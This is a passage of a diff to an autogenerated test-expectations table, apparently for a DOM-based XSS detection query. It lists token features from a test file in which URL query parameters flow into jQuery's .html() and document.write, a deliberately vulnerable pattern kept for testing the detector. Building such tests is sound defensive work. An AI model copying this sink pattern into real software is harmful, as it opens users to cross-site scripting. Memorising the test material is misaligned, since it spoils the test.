    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:17:25:17:32 | document | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:17:25:17:32 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:17:25:17:41 | document.location | CalleeFlexibleAccessPath | URL | +| autogenerated/Xss/DomBasedXss/tst.js:17:25:17:41 | document.location | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/tst.js:17:25:17:41 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:17:25:17:41 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:17:25:17:41 | document.location | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:17:25:17:41 | document.location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:17:25:17:41 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:17:34:17:41 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:17:34:17:41 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:17:34:17:41 | location | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:17:34:17:41 | location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:17:34:17:41 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:17:45:17:56 | searchParams | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:17:45:17:56 | searchParams | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:17:45:17:56 | searchParams | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:17:45:17:56 | searchParams | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:17:45:17:56 | searchParams | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:3 | $ | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:11 | $('name') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:11 | $('name') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:11 | $('name') | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:11 | $('name') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:11 | $('name') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:11 | exceptional return of $('name') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:11 | exceptional return of $('name') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:11 | exceptional return of $('name') | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:11 | exceptional return of $('name') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:11 | exceptional return of $('name') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:16 | $('name').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:16 | $('name').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:16 | $('name').html | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:16 | $('name').html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:16 | $('name').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:36 | $('name ... name')) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:36 | $('name ... name')) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:36 | $('name ... name')) | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:36 | $('name ... name')) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:36 | $('name ... name')) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:36 | exceptional return of $('name ... name')) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:36 | exceptional return of $('name ... name')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:36 | exceptional return of $('name ... name')) | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:36 | exceptional return of $('name ... name')) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:18:3:18:36 | exceptional return of $('name ... name')) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:18:5:18:10 | 'name' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:18:5:18:10 | 'name' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:18:5:18:10 | 'name' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16029,6 +112121,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:18:5:18:10 | 'name' | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | | autogenerated/Xss/DomBasedXss/tst.js:18:5:18:10 | 'name' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:18:5:18:10 | 'name' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:18:13:18:16 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:18:13:18:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:18:13:18:16 | html | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:18:13:18:16 | html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:18:13:18:16 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:18:18:18:23 | params | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:18:18:18:23 | params | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:18:18:18:23 | params | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:18:18:18:23 | params | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:18:18:18:23 | params | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:18:18:18:27 | params.get | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:18:18:18:27 | params.get | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:18:18:18:27 | params.get | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:18:18:18:27 | params.get | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:18:18:18:27 | params.get | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:18:18:18:35 | exceptional return of params.get('name') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:18:18:18:35 | exceptional return of params.get('name') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:18:18:18:35 | exceptional return of params.get('name') | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:18:18:18:35 | exceptional return of params.get('name') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:18:18:18:35 | exceptional return of params.get('name') | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:18:18:18:35 | params.get('name') | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:18:18:18:35 | params.get('name') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:18:18:18:35 | params.get('name') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16036,6 +112148,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:18:18:18:35 | params.get('name') | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | | autogenerated/Xss/DomBasedXss/tst.js:18:18:18:35 | params.get('name') | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:18:18:18:35 | params.get('name') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:18:25:18:27 | get | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:18:25:18:27 | get | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:18:25:18:27 | get | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:18:25:18:27 | get | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:18:25:18:27 | get | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:18:29:18:34 | 'name' | CalleeFlexibleAccessPath | params.get | | autogenerated/Xss/DomBasedXss/tst.js:18:29:18:34 | 'name' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:18:29:18:34 | 'name' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16044,6 +112161,51 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:18:29:18:34 | 'name' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:18:29:18:34 | 'name' | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:18:29:18:34 | 'name' | receiverName | params | +| autogenerated/Xss/DomBasedXss/tst.js:20:7:20:18 | searchParams | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:20:7:20:18 | searchParams | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:20:7:20:18 | searchParams | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:20:7:20:18 | searchParams | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:20:7:20:18 | searchParams | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:20:7:20:61 | searchP ... ing(1)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:20:7:20:61 | searchP ... ing(1)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:20:7:20:61 | searchP ... ing(1)) | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:20:7:20:61 | searchP ... ing(1)) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:20:7:20:61 | searchP ... ing(1)) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:20:7:20:61 | searchParams | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:20:7:20:61 | searchParams | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:20:7:20:61 | searchParams | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:20:7:20:61 | searchParams | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:20:7:20:61 | searchParams | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:20:22:20:61 | exceptional return of new URL ... ing(1)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:20:22:20:61 | exceptional return of new URL ... ing(1)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:20:22:20:61 | exceptional return of new URL ... ing(1)) | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
